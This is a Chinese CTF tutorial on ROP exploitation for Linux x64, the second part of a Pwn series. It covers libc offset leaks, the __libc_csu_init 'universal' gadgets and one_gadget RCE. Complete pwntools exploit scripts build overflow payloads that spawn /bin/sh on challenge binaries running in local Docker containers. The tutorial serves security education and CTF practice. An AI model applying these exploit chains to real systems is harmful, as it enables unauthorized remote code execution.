CTF必备技能丨Linux Pwn入门教程——ROP技术（下）

Linux Pwn入门教程系列分享如约而至，本套课程是做者依据i春秋Pwn入门课程中的技术分类，并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。

教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法，如栈，堆，整数溢出，格式化字符串，条件竞争等进行介绍，全部环境都会封装在Docker镜像当中，并提供调试用的教学程序，来自历年赛事的原题和带有注释的python脚本。

课程回顾>>

Linux Pwn入门教程第一章：环境配置

Linux Pwn入门教程第二章：栈溢出基础

Linux Pwn入门教程第三章：ShellCode

Linux Pwn入门教程——ROP技术（上）

 

教程中的题目和脚本如有使用不妥之处，欢迎各位大佬批评指正。

从给定的libc中寻找gadget

有时候pwn题目也会提供一个pwn环境里对应版本的libc。在这种状况下，咱们就能够经过泄露出某个在libc中的内容在内存中的实际地址，经过计算偏移来获取system和“/bin/sh”的地址并调用。

这一节的例子是~/Security Fest CTF 2016-tvstation/tvstation。这是一个比较简单的题目，题目中除了显示出来的三个选项以外还有一个隐藏的选项4，选项4会直接打印出system函数在内存中的首地址：

 

 从IDA中咱们能够看到打印完地址后执行了函数debug_func( )，进入函数debug_func( )以后咱们发现了溢出点。

 

 

因为这个题目给了libc，且咱们已经泄露出了system的内存地址。使用命令readelf -a 查看libc.so.6_x64。

 

从这张图上咱们能够看出来.text节（Section）属于第一个LOAD段（Segment），这个段的文件长度和内存长度是同样的，也就是说全部的代码都是原样映射到内存中，代码之间的相对偏移是不会改变的。

因为前面的PHDR, INTERP两个段也是原样映射，因此在IDA里看到的system首地址距离文件头的地址偏移和运行时的偏移是同样的。如：在这个libc中system函数首地址是0x456a0，即从文件的开头数0x456a0个字节到达system函数。

 

 

 调试程序，发现system在内存中的地址是0x7fb5c8c266a0。

 

0x7fb5c8c266a0 -0x456a0 =0x7fb5c8be1000‬

根据这个事实，咱们就能够经过泄露出来的libc中的函数地址获取libc在内存中加载的首地址，从而以此跳转到其余函数的首地址并执行。

在libc中存在字符串“/bin/sh”，该字符串位于.data节，根据一样的原理咱们也能够得知这个字符串距libc首地址的偏移。

 

还有用来传参的gadget :pop rdi; ret

 

据此咱们能够构建脚本以下：

#!/usr/bin/python
#coding:utf-8
from pwn import *
io = remote('172.17.0.2', 10001)
io.recvuntil(": ")
io.sendline('4') #跳转到隐藏选项
io.recvuntil("@0x")
system_addr = int(io.recv(12), 16) #读取输出的system函数在内存中的地址
libc_start = system_addr - 0x456a0 #根据偏移计算libc在内存中的首地址
pop_rdi_addr = libc_start + 0x1fd7a #pop rdi; ret 在内存中的地址，给system函数传参
binsh_addr = libc_start + 0x18ac40 #"/bin/sh"字符串在内存中的地址
payload = ""
payload += 'A'*40 #padding
payload += p64(pop_rdi_addr) #pop rdi; ret
payload += p64(binsh_addr) #system函数参数
payload += p64(system_addr) #调用system()执行system("/bin/sh")
io.sendline(payload)
io.interactive()

 

一些特殊的gadgets

这一节主要介绍两个特殊的gadgets。第一个gadget常常被称做通用gadgets，一般位于x64的ELF程序中的__libc_csu_init中，以下图所示：

 

 

这张图片里包含了两个gadget，分别是：

 

咱们知道在x64的ELF程序中向函数传参，一般顺序是rdi, rsi, rdx, rcx, r8, r9, 栈，以上三段gadgets中，第一段能够设置r12-r15，接上第三段使用已经设置的寄存器设置rdi, 接上第二段设置rsi, rdx, rbx，最后利用r12+rbx*8能够call任意一个地址。

在找gadgets出现困难时，能够利用这个gadgets快速构造ROP链。须要注意的是，用万能gadgets的时候须要设置rbp=1，由于call qword ptr [r12+rbx*8]以后是add rbx, 1; cmp rbx, rbp; jnz xxxxxx。因为咱们一般使rbx=0，从而使r12+rbx*8 = r12，因此call指令结束后rbx必然会变成1。若此时rbp != 1，jnz会再次进行call，从而可能引发段错误。那么这段gadgets怎么用呢？

咱们来看一下例子~/LCTF 2016-pwn100/pwn100，这个例子提供了libc，溢出点很明显，位于0x40063d。

咱们须要作的就是泄露一个got表中函数的地址，而后计算偏移调用system。前面的代码很简单，咱们就不作介绍了。

#!/usr/bin/python
#coding:utf-8
from pwn import *
io = remote("172.17.0.3", 10001)
elf = ELF("./pwn100")
puts_addr = elf.plt['puts']
read_got = elf.got['read']
start_addr = 0x400550
pop_rdi = 0x400763
universal_gadget1 = 0x40075a #万能gadget1：pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
universal_gadget2 = 0x400740 #万能gadget2：mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c #bss放了STDIN和STDOUT的FILE结构体，修改会致使程序崩溃
payload = "A"*72 #padding
payload += p64(pop_rdi) #
payload += p64(read_got)
payload += p64(puts_addr)
payload += p64(start_addr) #跳转到start，恢复栈
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.recvuntil('bye~\n')
read_addr = u64(io.recv()[:-1].ljust(8, '\x00'))
log.info("read_addr = %#x", read_addr)
system_addr = read_addr - 0xb31e0
log.info("system_addr = %#x", system_addr)

为了演示万能gadgets的使用，咱们选择再次经过调用read函数读取/bin/sh\x00字符串，而不是直接使用偏移，首先咱们根据万能gadgets布置好栈。

payload = "A"*72 #padding
payload += p64(universal_gadget1) #万能gadget1
payload += p64(0) #rbx = 0
payload += p64(1) #rbp = 1，过掉后面万能gadget2的call返回后的判断
payload += p64(read_got) #r12 = got表中read函数项，里面是read函数的真正地址，直接经过call调用
payload += p64(8) #r13 = 8，read函数读取的字节数，万能gadget2赋值给rdx
payload += p64(binsh_addr) #r14 = read函数读取/bin/sh保存的地址，万能gadget2赋值给rsi
payload += p64(0) #r15 = 0，read函数的参数fd，即STDIN，万能gadget2赋值给edi
payload += p64(universal_gadget2) #万能gadget2

咱们是否是应该直接在payload后面接上返回地址呢？不，咱们回头看一下universal_gadget2的执行流程：

 

因为咱们的构造，上面的那块代码只会执行一次，而后流程就将跳转到下面的loc_400756，这一系列操做将会抬升8*7共56字节的栈空间，所以咱们还须要提供56个字节的垃圾数据进行填充，而后再拼接上retn要跳转的地址。

payload += '\x00'*56 #万能gadget2后接判断语句，过掉以后是万能gadget1，用于填充栈
payload += p64(start_addr) #跳转到start，恢复栈
payload = payload.ljust(200, "B") #padding
接下来就是常规操做getshell
io.send(payload)
io.recvuntil('bye~\n')
io.send("/bin/sh\x00") #上面的一段payload调用了read函数读取"/bin/sh\x00"，这里发送字符串
payload = "A"*72 #padding
payload += p64(pop_rdi) #给system函数传参
payload += p64(binsh_addr) #rdi = &("/bin/sh\x00")
payload += p64(system_addr) #调用system函数执行system("/bin/sh")
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.interactive()

咱们介绍的第二个gadget一般被称为one gadget RCE，顾名思义，经过一个gadget远程执行代码，即getshell。咱们经过例子~/TJCTF 2016-oneshot/oneshot演示一下这个gadget的威力。

要利用这个gadget，咱们须要一个对应环境的libc和一个工具one_gadget。

 

从红框中的代码咱们看到地址rbp+var_8被做为__isoc99_scanf的第二个参数赋值给rsi，即输入被保存在这里。随后rbp+var_8中的内容被赋值给rax，又被赋值给rdx，最后经过call rdx执行。也就是说咱们输入一个数字，这个数字会被当成地址使用call调用。因为只能控制4字节，咱们就须要用到one gadget RCE来一步getshell。咱们经过one_gadget找到一些gadget：

 咱们看到这些gadget有约束条件。咱们选择第一条，要求rax=0。咱们构建脚本进行调试：

#!/usr/bin/python
#coding:utf-8
from pwn import *
one_gadget_rce = 0x45526
#one_gadget libc.so.6_x64
#0x45526 execve("/bin/sh", rsp+0x30, environ)
#constraints:
# rax == NULL
setbuf_addr = 0x77f50 
setbuf_got = 0x600ae0
io = remote("172.17.0.2", 10001)
io.sendline(str(setbuf_got))
io.recvuntil("Value: ")
setbuf_memory_addr = int(io.recv()[:18], 16) #经过打印got表中setbuf项的内容泄露setbuf在内存中的首地址
io.sendline(str(setbuf_memory_addr - (setbuf_addr - one_gadget_rce))) #经过偏移计算one_gadget_rce在内存中的地址
io.interactive()

执行到call rdx时rax = 0

 

getshell成功

 

以上是今天的内容，你们看懂了吗？后面咱们将持续更新Linux Pwn入门教程的相关章节，但愿你们及时关注。